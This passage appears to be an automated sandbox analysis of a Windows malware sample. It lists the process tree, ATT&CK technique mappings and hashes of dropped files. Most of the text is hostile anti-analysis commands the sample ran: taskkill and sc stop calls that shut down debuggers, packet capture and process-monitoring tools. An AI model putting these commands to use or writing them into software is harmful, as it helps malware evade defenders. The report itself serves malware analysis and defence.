C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:3912

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:1696

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:2636

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
PID:2772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:2364

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:2972

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:4800

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause >nul 2>&1
2⤵
PID:3368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
2⤵
PID:1736

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq die*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:396

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
2⤵
PID:3176

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebugger.exe
3⤵
PID:3872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
2⤵
PID:4320

C:\Windows\system32\taskkill.exe
taskkill /f /im FolderChangesView.exe
3⤵
- Kills process with taskkill
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
2⤵
PID:5092

C:\Windows\system32\sc.exe
sc stop HttpDebuggerSdk
3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
2⤵
PID:4640

C:\Windows\system32\sc.exe
sc stop npf
3⤵
- Launches sc.exe
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
2⤵
PID:4752

C:\Windows\system32\taskkill.exe
taskkill /f /im Ida64.exe
3⤵
- Kills process with taskkill
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
2⤵
PID:1696

C:\Windows\system32\taskkill.exe
taskkill /f /im OllyDbg.exe
3⤵
- Kills process with taskkill
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
2⤵
PID:4932

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg64.exe
3⤵
- Kills process with taskkill
PID:2772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
2⤵
PID:2356

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg32.exe
3⤵
- Kills process with taskkill
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3564

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:4744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:3200

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:1992

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:2992

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:1780

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:2796

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:2468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:2204

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:4484

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4240

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
- Drops file in System32 directory
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:1492

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:3644

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:996

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:4108

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
2⤵
PID:2724

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
3⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
2⤵
PID:2796

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
3⤵
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:3096

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:4752

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
2⤵
PID:4368

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerProSdk
3⤵
- Launches sc.exe
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
2⤵
PID:4792

C:\Windows\system32\sc.exe
sc stop KProcessHacker3
3⤵
- Launches sc.exe
PID:860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
2⤵
PID:4984

C:\Windows\system32\sc.exe
sc stop KProcessHacker2
3⤵
- Launches sc.exe
PID:1624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
2⤵
PID:1492

C:\Windows\system32\sc.exe
sc stop KProcessHacker1
3⤵
- Launches sc.exe
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
2⤵
PID:2364

C:\Windows\system32\sc.exe
sc stop wireshark
3⤵
- Launches sc.exe
PID:3188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:3640

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
PID:396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:3176

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3592

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:2724

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:3404

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4752

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:860

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
2⤵
PID:4508

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq die*" /IM * /F /T
3⤵
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4412

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
2⤵
PID:4036

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebugger.exe
3⤵
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
2⤵
PID:1128

C:\Windows\system32\taskkill.exe
taskkill /f /im FolderChangesView.exe
3⤵
- Kills process with taskkill
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
2⤵
PID:4856

C:\Windows\system32\sc.exe
sc stop HttpDebuggerSdk
3⤵
- Launches sc.exe
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
2⤵
PID:3004

C:\Windows\system32\sc.exe
sc stop npf
3⤵
- Launches sc.exe
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:2360

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4872

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
PID:1196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
2⤵
PID:2500

C:\Windows\system32\taskkill.exe
taskkill /f /im Ida64.exe
3⤵
- Kills process with taskkill
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
2⤵
PID:4944

C:\Windows\system32\taskkill.exe
taskkill /f /im OllyDbg.exe
3⤵
- Kills process with taskkill
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
2⤵
PID:4368

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg64.exe
3⤵
- Kills process with taskkill
PID:4824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
2⤵
PID:4780

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg32.exe
3⤵
- Kills process with taskkill
PID:1852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:5020

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:400

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:2952

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:2980

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:4908

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:3004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:4428

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:4316

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:4864

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
PID:1228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4384

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
462f3c1360a4b5e319363930bc4806f6

SHA1
9ba5e43d833c284b89519423f6b6dab5a859a8d0

SHA256
fec64069c72a8d223ed89a816501b3950f5e4f5dd88f289a923c5f961d259f85

SHA512
5584ef75dfb8a1907c071a194fa78f56d10d1555948dffb8afcacaaa2645fd9d842a923437d0e94fad1d1919dcef5b25bf065863405c8d2a28216df27c87a417

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
d2642245b1e4572ba7d7cd13a0675bb8

SHA1
96456510884685146d3fa2e19202fd2035d64833

SHA256
3763676934b31fe2e3078256adb25b01fdf899db6616b6b41dff3062b68e20a1

SHA512
99e35f5eefc1e654ecfcf0493ccc02475ca679d3527293f35c3adea66879e21575ab037bec77775915ec42ac53e30416c3928bc3c57910ce02f3addd880392e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
48B

MD5
9fcf6bf37983caa7948d6ec453b2d6e8

SHA1
f455871019b3439b4c79327d5f4b2e0b816d6da9

SHA256
3f8657b0920ea00b3b49af2c957c5814343efc8f77871e1d1a8fda372744d7c5

SHA512
f1bddfe4f34bef01e744e382c64a4722ca77aaa9368469add8ba6592f6dcfc9ff696bd9ce117db19b1a82f59473f31aa08c0f87782b3183bb4e85d6f8b1ced17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
120B

MD5
f30c1bec6096a56cbf53476c0c6d66e6

SHA1
0a7b42d02bffd397b01fb9a45f558c0fd5e2290a

SHA256
7681ffb961e2bad9247f5a7b8a4773670ee989a4b1a60d598f4f8c266ba5af63

SHA512
7f5eb2ddf8317ddac102f9103c85e3375c6f602069d4db84b5d4c4bdc5e2ac9702fd4c53fa942d2a5e141d4827e97c65987b5f78f41a795d2ecc51afc39d7b35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
e9e07c7753f4f36df111ba9a0f19b2f9

SHA1
f42eac2b561660ec25ab4261a3ffc579b3932098

SHA256
6786e67c66324720066a1658030846e11e707a3efb1e774a1241458191646f71

SHA512
b112d334d5ea1cae334ae10e91ae14e0608e697272442798cf98c475d8928997d752caed79407e9c6bd84ab56f8361f4e24f476be542e2eeb3e7aecda35a651f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
399B

MD5
a58128c0dfbc792ee585c6bb5cec5a71

SHA1
ea74f5503a189d4dd502be35d3a52dce256cd52c

SHA256
29a6ffd890b871bbbfe2077283c07e7da473ddc344600cafb8be636f69ddd025

SHA512
033c15937ab481f8735d3fea85d4700db2dae909c30dac32f7d6a5b5865698400f0f012df7a132156bf31658351ea82d83b42283b759100629563bba7d7b77b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
a3ecb65f1757134b6e51a49d16cd3646

SHA1
e650025d82cd3945452aada989e19d69cbf67aae

SHA256
844431807cf6e454330cde780be22626da4dc51510dad5cf27be02f4f4e10b51

SHA512
21015af373f34a7dc8eaa38b713cfec79d122cf39da86aea51505f177d4e4ac0e0ecef39c34134c16daaf69b16ff5dd21b4e450b87467fceeb0c2e4c3a292c83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
29e9f67ff56db42ac65705c6b04cd004

SHA1
33aa0b76d82274a71c21bfda44a2d7228a4d92ae

SHA256
b8aea7e5562166075fcb3e65594c952658d3b2d408ba329fd253e2628e9799b7

SHA512
00b31d7079c4495d734aa4840467eb3ea0d651d682eee88a7034b3e1dcc0c2b90d70ffe7c2b73179f220caede5ef46d660d83e6701b53aa394931a4a50402c01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
130644a5f79b27202a13879460f2c31a

SHA1
29e213847a017531e849139c7449bce6b39cb2fa

SHA256
1306a93179e1eaf354d9daa6043ae8ffb37b76a1d1396e7b8df671485582bcd1

SHA512
fbc8606bf988cf0a6dea28c16d4394c9b1e47f6b68256132b5c85caf1ec7b516c0e3d33034db275adf267d5a84af2854f50bd38a9ed5e86eb392144c63252e01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
ffe7514d14d06f52dbca4bb3c0c6da60

SHA1
3dc4d28ace0cf341217216c1960bcce353644f40

SHA256
e08fda9ff5f379e7908657cc81feac23a4cd5187a4a6010ccea63d3a015f1d99

SHA512
e045ae8b80083e217e909916472d706806ba6bf415111a716d6664f05d7bff0448d6eb0174173b0b120ac2a291cf21203e9f6b7e1dfc8c43dd47645cd570ca7e

Download Submit
C:\Windows\System32\NeptnDriver.sys
Filesize
9KB

MD5
a1367ef701a8b404b03e7437fe67309c

SHA1
e0134d68196f23ef0b48e088e556cf74bb06d173

SHA256
e791c02a1c32806c00c17d76d16d89a06713b66beecf51d644f47d9391f959f1

SHA512
